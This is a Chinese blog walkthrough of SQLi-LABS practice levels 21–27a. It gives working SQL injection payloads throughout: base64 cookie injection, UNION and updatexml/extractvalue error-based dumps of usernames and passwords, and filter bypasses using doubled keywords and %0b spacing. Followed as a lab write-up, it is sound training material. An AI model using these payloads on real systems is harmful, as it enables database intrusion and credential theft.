SQLi-LABS的Less21-30分析_less-21 coolie注入(1)

已于 2024-04-28 17:22:36 修改
阅读量648 收藏 19
点赞数 7
分类专栏: 程序员 文章标签: less 数据库 sql
于 2024-04-28 17:22:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84281655/article/details/138285105
版权

Cookie: uname=1’) UNION SELECT 1,2,database()#

Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZGF0YWJhc2UoKSM=

接下来要换成updatexml语句了,不然会报错

Cookie: uname=1’) UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = ‘security’#

Cookie:uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBXSEVSRSB0YWJsZV9zY2hlbWEgPSAnc2VjdXJpdHknIw==

Cookie: uname=1’) UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema = ‘security’ AND table_name = ‘users’#

Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgQU5EIHRhYmxlX25hbWUgPSAndXNlcnMnIw==

Cookie: uname=1’) UNION SELECT 1,2,group_concat(concat(“:”,username,password)) FROM security.users#

Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbmNhdCgiOiIsdXNlcm5hbWUscGFzc3dvcmQpKSBGUk9NIHNlY3VyaXR5LnVzZXJzIw==

Less22

总的来说与Less21基本一样,不过注入点为双引号"

Less23

输入?id=1正常显示,输入?id=1‘或者?id=1’)或者?id=1’))报错,加入注释符–+或者#还报错,那么推测也许将注释符号过滤了,那么尝试//‘?id=1’(这语句结束后带个’来与括号后的’闭合从而结束语句)‘,那么尝试下万能语句看看?id=1’ or 1=1 or’显示正常了,?id=1’) or 1=1 or’或者?id=1’)) or 1=1 or’报错,那么注入点为’输入语句

?id=-1’ UNION SELECT 1,2,3 ’

爆库

?id=-1’ UNION SELECT 1,2,database() ’

爆表名

?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=‘security’ ’

爆字段吧

?id=-1’ union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema=‘security’ and table_name=‘users’ ’

爆数据的时候报错了

?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users’

那么也许格式语法问题,不过用个where语句试试看

?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users where ‘1’='1

这语句成功通过

Less24

在登陆界面注入登录失败了,那么输入admin看看会发生什么显示你可改密码,返回页面点new users click here设置新用户admin’看看然后返回主页面登录成功

Less25

明显的提示all your ‘or’ and ‘and’ belong to us

照例先输入?id=1或者?id=1’或者?id=1’)或者?id=1"或者?id=1")

那么输入?id=1’或者?id=1’)报错了

加上注释符f分别输入?id=1’–+跟?id=1’)–+

那么?id=1’–+没报错,猜测注入点为’

根据提示your ‘or’ belong to us那么用or构造个万能语句看看输入?id=1’ or 1=1–+

显示为报错

那么怎么使用or不报错了

试试在语句or插入一个or语句,如果中间or被过滤掉了剩余部分构成or就成功了

判断列数

?id=1’ oorrder by 4–+

使用union语句

?id=-1’ UNION SELECT 1,2,3–+

爆库

?id=-1’ UNION SELECT 1,2,database()–+

爆表名

?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM infoorrmation_schema.tables WHERE table_schema = ‘security’–+

爆字段名

?id=-1’ union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=‘users’–+

爆数据

?id=-1’ union select 1,2,group_concat(concat_ws(“:”,username,passwoorrd)) from security.users–+

Less-25a

将1’改为1,其他与Less-25没什么区别

Less-26

看到提示all your spaces and comments belong to us

输入得到?id=1’或者?id=1’)报错,加上注释符–+仍然报错

那么根据Less25的经验输入?id=‘’

看看会发生什么,显示成功没报错,那么注入点为’

被过滤的字符,可用其他的字符进行替代,用"%a0"或"%0b"替代空格,用"||“替代"or”,使用"%26%26"替代"and"

输入?id=-1’ || 1 = 1 || ’

显示正常

那么用updatexml()报错注入爆库名吧

?id=-1’ || updatexml(1,concat(0x7e,database()),1) || ‘1’='1

爆表名

?id=1’ || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema=‘security’))) ,1) || ‘1’='1

爆字段名

?id=1’||updatexml(1,concat(1,(SELECT (group_concat(column_name)) FROM (infoorrmation_schema.columns) WHERE (table_schema=‘security’ %26%26 table_name = ‘users’))) ,1) || ‘1’='1

爆数据

试着觉得无法直接从users表拿数据,那么先用一个表暂存然后利用另一个去拿

?id=-1’ || updatexml(1,concat(0x0a,(SELECT(group_concat(concat_ws(0x3a,username,passwoorrd))) FROM (security.users) WHERE (id = 1) )) ,1) || ‘1’='1

Less-26a

注入点为’)

Less27

注入点为’

爆库

?id=1’%0band%0bextractvalue(1,concat(0x7e,database(),0x7e))%0bor%0b’1’='1

爆表

?id=1’%0band%0bextractvalue(1,concat(0x7e,(selecT%0bgroup_concat(table_name)%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=database()),0x7e))%0bor%0b’1’='1

//直接select会被过滤掉要改为selecT

爆字段

?id=1’%0band%0bextractvalue(1,concat(0x7e,(selecT%0bgroup_concat(column_name)%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema=database()%0band%0btable_name=‘users’),0x7e))%0bor%0b’1’='1

爆数据

?id=1’%0band%0bextractvalue(1,concat(0x7e,(selecT%0bgroup_concat(username,password)%0bfrom%0busers),0x7e))%0bor%0b’1’='1

Less-27a

输入?id=1"报错,?id=1")%0Bor%0B(“1”)=(“1报错,?id=1”%0bor%0b"1"="1正常

那么猜测属于双引号注入

看看回显怎么样

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84281655
关注
  • 7
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQLi LABS Less-30
wangyuxiang946的博客
08-16 1万+
sqlilabs30SQLi-labs第30关使用GET请求传递参数,在url中构造payload即可
有了这个网络安全面试题,面试就像开了挂!(附PDF)
最新发布
lvaolan的博客
02-26 670
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
sqli-labs靶场详解(less29-less31)
m0_72125469的博客
11-28 438
服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache为引擎的 php 服务器,真正提供 web 服务的是 php 服务器。id=1&id=2'&id=4 返回第id=4的数据 id=2'也不报错 也不提示攻击失败。id=1&id=2' 不报错还查询出了结果 看来也是字符型 但是不是使用的单引号。id=1&id=2 返回id=2的数据id=1的数据不返回。
sqli-labs————less 21
Fly_鹏程万里
05-12 1563
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一关的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该关的代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
[靶场] SQLi-Labs Less21-Less27a
3hex的博客
09-25 355
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 21.Less21 请求方式 注入方式 类型 备注 POST 基于报错注入(updatexml函数) 字符型 Base64编码,Cookie注入点,单引号、括号闭合 已经提前取得一个用户信息,用户名dumb,密码2。 并且之后的操作都是用BurpSuite的重发器测试。 1. 正常提交 首先正常登陆上去。 可以发现Cookie进行了Base64编码,我们后续操作都需要对语句进行Base64编.
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 416
sql-lib项目,本篇文章介绍关卡21-25。 闭合变成了双引号,其余和上一关一样。 这一关过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
Less21-22 (基于base64的cookie注入)
老司机开代码的博客
08-03 322
文章目录1. 题目分析2. 通关思路 1. 题目分析 目前已经完成了Basic Challenges,相信小伙伴们对于SQL注入也有了一定程度的理解。但是,还是脱离不了小白的称号,那么今天我们就向Advanced Injections进军。 首先还是先登录进去看一下情况, 这一关卡和Less20的手法其实是一摸一样的,只不过多了一道加密解密的步骤。通过观察这个cookie可以判断出来是一个加密过后的密文,而题目也给出了是base64加密,那么我们就把这个复制下来解密一下看看。 可以看到YWRtaW4=其
sqli-labs通关(less21~less30
箭雨镜屋
09-03 3075
Less21 这关刚开始还是和Less20一样,进去是个登录的页面 输入正确的用户名和密码之后,返回的页面有User-Agent,客户端ip地址,cookie,用户名,密码,用户id等信息 登录过程中burpsuite也是抓到两个报文,第一个是发送用户名和密码的POST报文,第二个是GET报文且携带cookie 仔细看这关的GET报文,就和上一关不一样了,Cookie中uname参数的值是base64编码的。 把uname的值粘贴到burpsuite的decoder模块,先decod.
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
(手工)【sqli-labs21-22】cookie加密注入:payload、利用过程
07-11 510
SQL-cookie加密注入
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 2945
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
sqli-labs less21
qq_45106794的博客
10-26 300
#sqli-labs less 19 这一关大概与less18差不多,只不过playload得用base64加密 ') order by 4 ') union select 1,2,3 # ')union select 1,database(),version()# ')union select 1,(select group_concat(table_name) from information...
sqli-labs (less-21)
kukudeshuo的博客
03-11 313
sqli-labs (less-21) 进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密 转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了 #以下过程均是base64转码后的结果 先输入一个 Jw== #'单引号 屏幕回显错误,根据错误信息
sql注入】Less21-25a
lyy0xfff的博客
07-16 219
SQL注入PrefaceLess-21Less-22Less-23Less-25Less-25a Preface 由于前面20关我已经做完了,所以后面的个别关卡只提供一个思路或者如何绕过防御以及证明注入点存在即可,思路都是Less-1我们学的子查询语句 Less-21 0x00 由题目得知这是一道Cookie注入的题目,且cookie被编码成base64的编码格式。 什么是base64编码呢 Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值